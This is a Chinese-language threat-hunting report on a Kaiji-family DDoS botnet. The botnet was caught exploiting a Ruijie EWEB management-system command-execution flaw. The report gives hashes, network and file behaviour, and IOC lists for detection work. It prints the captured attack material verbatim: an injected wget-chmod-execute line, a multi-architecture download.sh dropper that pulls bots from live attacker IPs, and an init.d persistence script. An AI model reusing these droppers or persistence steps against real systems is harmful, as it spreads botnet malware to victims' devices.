关键字:Linux/go/Kaiji/20220615
在做威胁狩猎的时候部署蜜罐已经很难捕捉到高端攻击了,可以尝试下部署真实设备及网络环境进行监测,做一个真实的狩猎场。
2022年6月15日在一台“锐捷网络-EWEB网管系统”的设备上捕获到了一个Nday的利用(/guest_auth/guestIsUp.php接口命令执行)。漏洞被利用后自动化进行脚本写入、脚本下载、下载僵尸程序、持久化等一系列操作。
1、捕获操作如下
1.1、脚本写入操作
利用上述漏洞在tmphtmlddiservertest644下写入test644.php文件
'wget http://209.141.60.137:4679/llii;chmod 777 llii;./llii'); exec(
同时还会在tmphtmlddiserver目录下创建test644_tmp目录,具体做了什么已经查不到了,怀疑是下载临时文件并运行。
1.2、脚本下载
下载download.sh保存在/tmp/目录下
#!/bin/sh
address="103.254.72.193:808"
os=`uname -s`
arch=`uname -m`
if [ $os = "Linux" ]; then
case $arch in
"i"*"86")
wget -t 1 http://$address/linux_386||curl -O --connect-timeout 10 http://$address/linux_386;chmod +x linux_386;./linux_386||rm -f linux_386
;;
"x86_64")
wget -t 1 http://$address/linux_amd64||curl -O --connect-timeout 10 http://$address/linux_amd64;chmod +x linux_amd64;./linux_amd64||rm -f linux_amd64
;;
"amd64")
wget -t 1 http://$address/linux_amd64||curl -O --connect-timeout 10 http://$address/linux_amd64;chmod +x linux_amd64;./linux_amd64||rm -f linux_amd64
;;
"mips")
wget -t 1 http://$address/linux_mips||curl -O --connect-timeout 10 http://$address/linux_mips;chmod +x linux_mips;./linux_mips||rm -f linux_mips
wget -t 1 http://$address/linux_mipsel||curl -O --connect-timeout 10 http://$address/linux_mipsel;chmod +x linux_mipsel;./linux_mipsel||rm -f linux_mipsel
wget -t 1 http://$address/linux_mips_softfloat||curl -O --connect-timeout 10 http://$address/linux_mips_softfloat;chmod +x linux_mips_softfloat;./linux_mips_softfloat||rm -f linux_mips_softfloat
wget -t 1 http://$address/linux_mipsel_softfloat||curl -O --connect-timeout 10 http://$address/linux_mipsel_softfloat;chmod +x linux_mipsel_softfloat;./linux_mipsel_softfloat||rm -f linux_mipsel_softfloat
;;
"mips64")
wget -t 1 http://$address/linux_mips64||curl -O --connect-timeout 10 http://$address/linux_mips64;chmod +x linux_mips64;./linux_mips64||rm -f linux_mips64
wget -t 1 http://$address/linux_mips64el||curl -O --connect-timeout 10 http://$address/linux_mips64el;chmod +x linux_mips64el;./linux_mips64el||rm -f linux_mips64el
wget -t 1 http://$address/linux_mips64_softfloat||curl -O --connect-timeout 10 http://$address/linux_mips64_softfloat;chmod +x linux_mips64_softfloat;./linux_mips64_softfloat||rm -f linux_mip
1.3、下载僵尸程序
通过上一步运行download.sh后根据操作系统不同架构会下载不同的僵尸程序运行,并删除自身。
1.4、持久化
程序运行后会做一些持久化的工作。
/etc/rc.d/init.d/linux_kill持久化
### BEGIN INIT INFO
#chkconfig: 2345 10 90
#description:System.img.config
# Default-Start: 2 3 4 5
# Default-Stop:
### END INIT INFO
/boot/System.img.config
exit 0
写入文件行为:
/boot/System.img.config
/etc/32678
/etc/id.services.conf
/etc/init.d/linux_kill
2、样本获取
2.1、HFS获取样本
通过1.1发现url下载地址http://209.141.60.137:4679/llii,但是目前已经无法下载。但是通过端口扫描发现开放了其他端口。
http://209.141.60.137:6359/发现HFS
可以获取样本liss_a5和liss_a6两个。
2.2、URL获取样本
通过1.2脚本中地址可以获取
三、样本分析
3.1、liss_a6和liss_a5
以liss_a6为例:
3.1.1、基本信息
MD5 d97d73970fb455875ade28aac1bf6fb2
98cce5ef07f4540a8cf1d1c31e0013fb2f2798e3
File type ELF
File size 4.44 MB (4653056 bytes)
go语言编写
3.1.2、网络行为
angelcyberspace.xyz
20.24.75.127:8087 (TCP)
3.1.3、文件行为
释放并执行文件
/etc/id.services.conf
/etc/32678
/boot/System.img.config
/etc/32678 为脚本文件
while [ 1 ]; do
sleep 60
/etc/id.services.conf
done
3.2、linux_386
3.2.1、基本信息
MD5 8c91f574e4a6f867036898c647e0e094
ff5ba9cc14361d1954b56fe97752a2fcd87e69ba
File type ELF
File size 5.01 MB (5251072 bytes)
go语言编写
3.2.2、网络行为
tomca1.com
103.254.72.193:10099 (TCP)
103.254.72.193:808 (TCP)
3.2.3、文件行为
写入并执行文件
/etc/id.services.conf
/etc/32678
/boot/System.img.config
3.3、家族分析
目测两个样本为同一家族,但网络通信地址不同,是不是使用同一僵尸程序的两个团伙还不确定。
通过逆向分析样本发现程序函数名混用英文和拼音,如main_rundingshi、main_runganran、main_runshouhu、main_runkaiji。
4、IOC总结
4.1、网络监测
209.141.60.137
angelcyberspace.xyz
20.24.75.127
tomca1.com
103.254.72.193
4.2、文件检测
/tmp/html/ddi/server/test644/test644.php
/tmp/html/ddi/server/test644_tmp/
/tmp/download.sh
/etc/rc.d/init.d/linux_kill
/boot/System.img.config
/etc/32678
/etc/id.services.conf
/etc/init.d/linux_kill
原文始发于微信公众号(也许安全):通过一个Nday发现的DDOS家族